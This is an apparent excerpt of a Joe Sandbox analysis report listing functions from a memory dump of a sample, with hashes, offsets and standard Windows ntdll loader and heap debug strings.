                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.}5
                                                                                                                                • API String ID: 0-1530669686
                                                                                                                                • Opcode ID: 6c93343632cb682fc3966ea4dc2798b6c7a73eaadf7eec31dd40e6e25aaa4a8b
                                                                                                                                • Instruction ID: e37497923e1d239a3aadab8586a3c2cde1fb91934400346417c13f3aba1cd9aa
                                                                                                                                • Opcode Fuzzy Hash: 6c93343632cb682fc3966ea4dc2798b6c7a73eaadf7eec31dd40e6e25aaa4a8b
                                                                                                                                • Instruction Fuzzy Hash: B8A16EB25183059FE321CF64C844B9BB7E9BB84755F014A2EF9889B240EB75D908CF93
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357DD6D0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlDebugPrintTimes.NTDLL ref: 357DD879
                                                                                                                                  • Part of subcall function 357B4779: RtlDebugPrintTimes.NTDLL ref: 357B4817
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-1975516107
                                                                                                                                • Opcode ID: 99529d426244b650b10fc09f0f6a85f448d0f74bbb3ba08dbb6a254d3abbda7e
                                                                                                                                • Instruction ID: 2bef73e6e99b9f588c5850c7a2cd59370b551c09d5614af4dfe0ff2f4234c3a5
                                                                                                                                • Opcode Fuzzy Hash: 99529d426244b650b10fc09f0f6a85f448d0f74bbb3ba08dbb6a254d3abbda7e
                                                                                                                                • Instruction Fuzzy Hash: 2351AA75A04385DFEB45CFA4C48879DFBF2BB44314F664099D8016F281DB74A986CBD0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3585F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                • API String ID: 0-2224505338
                                                                                                                                • Opcode ID: 332fd09b78e77382b7b1d477d5cdd0204e29c22911990086b853b4b013540f7e
                                                                                                                                • Instruction ID: 193119419c080aa84fe4a66360b12cb50dd802bfca4d42ae9703440e250a366b
                                                                                                                                • Opcode Fuzzy Hash: 332fd09b78e77382b7b1d477d5cdd0204e29c22911990086b853b4b013540f7e
                                                                                                                                • Instruction Fuzzy Hash: AC51ACBA661288EFD701CFA4D88CF5AB7F4EB046B4F1188A9F8059F261CB75DD50CA50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 35838633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • VerifierDebug, xrefs: 35838925
                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 358386BD
                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 3583880F
                                                                                                                                • VerifierFlags, xrefs: 358388D0
                                                                                                                                • VerifierDlls, xrefs: 3583893D
                                                                                                                                • HandleTraces, xrefs: 3583890F
                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 358386E7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                • Opcode ID: 25a245dd5e523a9619c63575614a77f0ddef736146669fb44f799f8d8c7403a7
                                                                                                                                • Instruction ID: f69325c98f37ae3d50242c77068b27d21f61a5a30484722cea4da97751629bae
                                                                                                                                • Opcode Fuzzy Hash: 25a245dd5e523a9619c63575614a77f0ddef736146669fb44f799f8d8c7403a7
                                                                                                                                • Instruction Fuzzy Hash: AE91EF7AA0B751AFE711CF68C882B5AB7F5BB44714F450958E950AF240EB70AC06CFD2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357D237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • DGx5, xrefs: 357D2382
                                                                                                                                • LdrpDynamicShimModule, xrefs: 3581A7A5
                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 3581A79F
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 3581A7AF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DGx5$Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-4193848126
                                                                                                                                • Opcode ID: ff1c2ae8ddc8ad4511f509112336ae7e4d7a1680e81ad9bfe491656881a8bec0
                                                                                                                                • Instruction ID: 9e4042ae43d480c02b641a1b0ef12a2b5a08ad2d42a1eddb6bd27a6591f54440
                                                                                                                                • Opcode Fuzzy Hash: ff1c2ae8ddc8ad4511f509112336ae7e4d7a1680e81ad9bfe491656881a8bec0
                                                                                                                                • Instruction Fuzzy Hash: B331D276A10200EFE7149F59D886F9AB7B6FB80740F154069ED11AB250DFB0AE43CBD0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357AF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-523794902
                                                                                                                                • Opcode ID: d76624567b41aa34078c58afdac22515029c5382cbd0a9d4ed54a0146bb12a04
                                                                                                                                • Instruction ID: 7fae2bd454486aa276f0c6e9a793a22640de489eab1eb9a5f2b5e20ef62c55ed
                                                                                                                                • Opcode Fuzzy Hash: d76624567b41aa34078c58afdac22515029c5382cbd0a9d4ed54a0146bb12a04
                                                                                                                                • Instruction Fuzzy Hash: 2542D07A219341AFD305CF28C884B6ABBE6FF84348F044A69E4958F351DB74D946CF52
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357D510F Relevance: 7.9, Strings: 6, Instructions: 434COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.}5
                                                                                                                                • API String ID: 0-1245041278
                                                                                                                                • Opcode ID: 41abb3c4507c64b1d1db6c7ff9bc2de976c068fc0674492b8512d34cb9110cd6
                                                                                                                                • Instruction ID: 30bfdc6510ca158e6b2edc74208463b6f7111248446c28f1b92bb4916369b9f3
                                                                                                                                • Opcode Fuzzy Hash: 41abb3c4507c64b1d1db6c7ff9bc2de976c068fc0674492b8512d34cb9110cd6
                                                                                                                                • Instruction Fuzzy Hash: 68F12CB6E05219EBDB11CF98C984EDEBBF9FF08790F51405AE905AB210E7719E01CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357CB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                • API String ID: 0-122214566
                                                                                                                                • Opcode ID: 9cc63840ea67efae78dac33a5068ac78c06ae4e276103c21f6ccee5f3f520baa
                                                                                                                                • Instruction ID: 31b87744365f7a9262d6527a78c4d1d6f5e5ab6eb61452b744c56b885aa8bafe
                                                                                                                                • Opcode Fuzzy Hash: 9cc63840ea67efae78dac33a5068ac78c06ae4e276103c21f6ccee5f3f520baa
                                                                                                                                • Instruction Fuzzy Hash: 8CC12275A04315ABEB15CB64C889BBEB7B6FF45700F9041A9EC0AAF290DBB4DD44C790
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-792281065
                                                                                                                                • Opcode ID: 295f6d4b943cf8b93a58526f5875a09393715c1c9e6902d66ba9c2138fdeb99f
                                                                                                                                • Instruction ID: 623a0e1ab20d71a75afec2ccca818078d5312453be6472620845124b2b03099e
                                                                                                                                • Opcode Fuzzy Hash: 295f6d4b943cf8b93a58526f5875a09393715c1c9e6902d66ba9c2138fdeb99f
                                                                                                                                • Instruction Fuzzy Hash: D1912675B097549FEB25CF18E844BAA7BB1BB01754F100169E9126F290DFB0AC82CBE1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357EC5C6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpInitializeProcess, xrefs: 357EC5E4
                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 35827FF0
                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 35827F82, 35827FF6
                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 35827F7B
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 35827F8C, 35828000
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 357EC5E3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-475462383
                                                                                                                                • Opcode ID: 9bda00f3ebb4ab776857ba92b49e5db7e305b81d35919deda6e7e6be5d24a0ca
                                                                                                                                • Instruction ID: 2bfc36338c3f8296f5f59196e6ec4ebf89b310ef747557f6409614e0946f0bdb
                                                                                                                                • Opcode Fuzzy Hash: 9bda00f3ebb4ab776857ba92b49e5db7e305b81d35919deda6e7e6be5d24a0ca
                                                                                                                                • Instruction Fuzzy Hash: AA31C5757093419FD314DF29D849E2ABBE5EF84710F014558F985AF391DB20EC05CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357E2594 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 35821FC9
                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 35821FA9
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 35821F82
                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 35821F6A, 35821FA4, 35821FC4
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 35821F6F
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 35821F8A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                • API String ID: 0-861424205
                                                                                                                                • Opcode ID: 6f83e74384220c2b77322639eb37f5ef1a1aafaccc55faebb32e863de283450a
                                                                                                                                • Instruction ID: 809eb4d4ddc64069fa3d7bc98eda99dd62b78f72a9737d025c803becbbea6aac
                                                                                                                                • Opcode Fuzzy Hash: 6f83e74384220c2b77322639eb37f5ef1a1aafaccc55faebb32e863de283450a
                                                                                                                                • Instruction Fuzzy Hash: 5B31E2B6B083647FE7108E869C45F9B7B68EF46790F124599B9107B244C770EE418BE1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357C0680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                • Opcode ID: 14bef559b7de78b070aa3adc9fc1ebc9b49358741a561059a7e9517b6c8fb20f
                                                                                                                                • Instruction ID: aa03555e7d2978534039ed926366ac5536bc52729588ab495ccb36bee87845ab
                                                                                                                                • Opcode Fuzzy Hash: 14bef559b7de78b070aa3adc9fc1ebc9b49358741a561059a7e9517b6c8fb20f
                                                                                                                                • Instruction Fuzzy Hash: A0F16674A01605DFEB05CF68C898F6AB7B6FB44344F1081A9E8169B391DB74EA81CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357D9723 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 179timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                                                                                                • API String ID: 3446177414-2283098728
                                                                                                                                • Opcode ID: b6e5d954c9ea239515a0e0066e425afc4080a49e9a25ee83a2e63bc443555c8f
                                                                                                                                • Instruction ID: ed3bf59aa44b3fb09bd88ebd4a00fe86d3753deb5d6d9ec34822d1d7f4f479c4
                                                                                                                                • Opcode Fuzzy Hash: b6e5d954c9ea239515a0e0066e425afc4080a49e9a25ee83a2e63bc443555c8f
                                                                                                                                • Instruction Fuzzy Hash: 0551FD757043019FE714DF38C888F2AB7F2BB88724F14066DE8529F290EB70A841CB92
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357EC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • Failed to reallocate the system dirs string !, xrefs: 358280E2
                                                                                                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 358280E9
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 358280F3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 3446177414-1783798831
                                                                                                                                • Opcode ID: 07902f50062085e1800916adcc8ab79c0e5997110cfbfde978df826295bc30ac
                                                                                                                                • Instruction ID: 52daf07b9c16f33d89e50a52a841fb7db9bce5acdc3ffef86988736a43087ec3
                                                                                                                                • Opcode Fuzzy Hash: 07902f50062085e1800916adcc8ab79c0e5997110cfbfde978df826295bc30ac
                                                                                                                                • Instruction Fuzzy Hash: DC41F3B9614300ABD710EF69EC44F5B77F9BF85750F01896AB958AB290EF34E801CB91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 358343D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                • LdrpCheckRedirection, xrefs: 3583450F
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 35834519
                                                                                                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 35834508
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 3446177414-3154609507
                                                                                                                                • Opcode ID: feddde78e39d3cbf8455d53f876652f7f0ee30641eb03286c3588fd76964c1a2
                                                                                                                                • Instruction ID: 4a7cbc504d3b0fecccc9cbe8c89d0a66a28e360aae4f2e282eaf4cb8128a3231
                                                                                                                                • Opcode Fuzzy Hash: feddde78e39d3cbf8455d53f876652f7f0ee30641eb03286c3588fd76964c1a2
                                                                                                                                • Instruction Fuzzy Hash: 4841D07A607311AFDB11CF58D84AA1677E5BF48650F0506B9EC999B275EB30EC00CBC1
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 3588ACEB Relevance: 6.4, APIs: 4, Instructions: 450timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DebugPrintTimes
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3446177414-0
                                                                                                                                • Opcode ID: 671453b97e523f7e032f2bd18679088e33343f13ff40826611e563cadb20e397
                                                                                                                                • Instruction ID: 6327aa62b2f8f6e131dc6c87d420901e9082df4f4115487be8070fad2fc76e5a
                                                                                                                                • Opcode Fuzzy Hash: 671453b97e523f7e032f2bd18679088e33343f13ff40826611e563cadb20e397
                                                                                                                                • Instruction Fuzzy Hash: 00F1D576F006158FCB18CF68C9906BDBBF6EF88250B594169D8A6DB380E774EE41CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357A7662 Relevance: 6.3, Strings: 5, Instructions: 51COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000002.00000002.10110110994.0000000035780000.00000040.00001000.00020000.00000000.sdmp, Offset: 35780000, based on PE: true
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                • Associated: 00000002.00000002.10110110994.00000000358AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_2_2_35780000_Antndte.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                • API String ID: 0-3061284088
                                                                                                                                • Opcode ID: 323c3b608c17d1ef4336a8f0fb06b74dbebb0c156df84fd9f2458b5b2795805d
                                                                                                                                • Instruction ID: 0dfb356ca133648e310ef166c6c999e360c383950de9be40b33817b76db23df6
                                                                                                                                • Opcode Fuzzy Hash: 323c3b608c17d1ef4336a8f0fb06b74dbebb0c156df84fd9f2458b5b2795805d
                                                                                                                                • Instruction Fuzzy Hash: 51014737124290FEE3058728F80DFE67BA4EB81770F26409AE8054FB908FA59C45D960
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 357B0485 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135timeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
